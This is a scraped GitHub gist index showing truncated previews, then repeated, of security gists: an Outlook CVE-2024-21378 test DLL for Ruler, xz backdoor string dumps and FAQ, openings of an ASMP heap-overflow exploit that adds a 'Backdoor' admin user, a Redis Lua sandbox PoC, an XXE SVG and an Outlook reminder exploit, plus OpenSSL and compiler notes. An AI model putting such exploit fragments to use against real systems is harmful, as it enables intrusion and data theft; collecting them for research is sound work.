infernalheaven

## test_dll.c
/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability,
 *    specifically targeting MS Outlook.
 *
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

## hashes.txt
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'

## xz-backdoor.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / xz-backdoor.md
            
            
              Created
              March 29, 2024 22:02
                — forked from thesamesam/xz-backdoor.md
            
              
                xz-utils backdoor situation
              
          
    FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in
xz-utils, a suite of software that
gives developers lossless compression. This package is commonly used
for compressing release tarballs, software packages, kernel images,
and initramfs images. It is very widely distributed, statistically
your average Linux or macOS system will have it installed for

  
## OpenSSL cheat sheet for socket programmers.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / OpenSSL cheat sheet for socket programmers.md
            
            
              Created
              January 9, 2024 16:29
                — forked from azadkuh/OpenSSL cheat sheet for socket programmers.md
            
              
                OpenSSL cheat sheet. This is a brief howto for socket programmers.
              
          
    #OpenSSL cheat sheet
This is a brief howto for socket programmers.
create RSA key pairs

ex: 1024bits length key pair:
$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem

  
## asmpwn.py
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8  = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211  # port is hardcoded in the binary
    usernm = username.encode()

## Redis CVE-2015-4335 EVAL Lua Sandbox Security Bypass Vulnerability PoC
#!/usr/bin/env python
# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl

import sys
import time
import getopt
import socket

'''
Gives the hexadecimal representation of "command"

## host_getter.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / host_getter.svg
            
            
              Created
              April 17, 2023 12:44
                — forked from jakekarnes42/host_getter.svg
            
              
                An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
              
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## find_symbol.sh
#!/bin/bash
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}:   " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME"

## PidLidReminderPwn.py
#!/usr/bin/python -u

from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW

from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

## gist:2243996a3f9b2924ea93424efb3cadd2
Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
mysterious cases where it helps?

A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.

TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed overflow UB exploitation is an attempt to work around this.
	/**
	* This DLL is designed for use in conjunction with the Ruler tool for
	* security testing related to the CVE-2024-21378 vulnerability,
	* specifically targeting MS Outlook.
	*
	* It can be used with the following command line syntax:
	* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
	* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
	*
	* After being loaded into MS Outlook, it sends the PC's hostname and
	0810 b' from '
	0678 b' ssh2'
	00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
	0708 b'%s'
	0108 b'/usr/sbin/sshd\x00'
	0870 b'Accepted password for '
	01a0 b'Accepted publickey for '
	0c40 b'BN_bin2bn\x00'
	06d0 b'BN_bn2bin\x00'
	0958 b'BN_dup\x00'
	import socket, struct, sys
	p32 = lambda x: struct.pack(">I", x)
	p16 = lambda x: struct.pack(">h", x)
	p8 = lambda x: struct.pack(">b", x)

	# ASMP heap overflow exploit creates new applianceAdmin user
	def exploit(hostname, username="Backdoor", password="Backdoor"):
	global socks # python closes out of scope sockets
	port = 3211 # port is hardcoded in the binary
	usernm = username.encode()
	#!/usr/bin/env python
	# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl

	import sys
	import time
	import getopt
	import socket

	'''
	Gives the hexadecimal representation of "command"
	#!/bin/bash
	SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 \| grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; \| grep -e " $SYMBOL_NAME"
	#!/usr/bin/python -u

	from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
	from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW

	from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
	BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter

	import urllib3
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
	Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
	mysterious cases where it helps?

	A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
	I think it's useful to know what compiler writers are accomplishing by this.

	TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
	major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
	fairly common cases. The signed overflow UB exploitation is an attempt to work around this.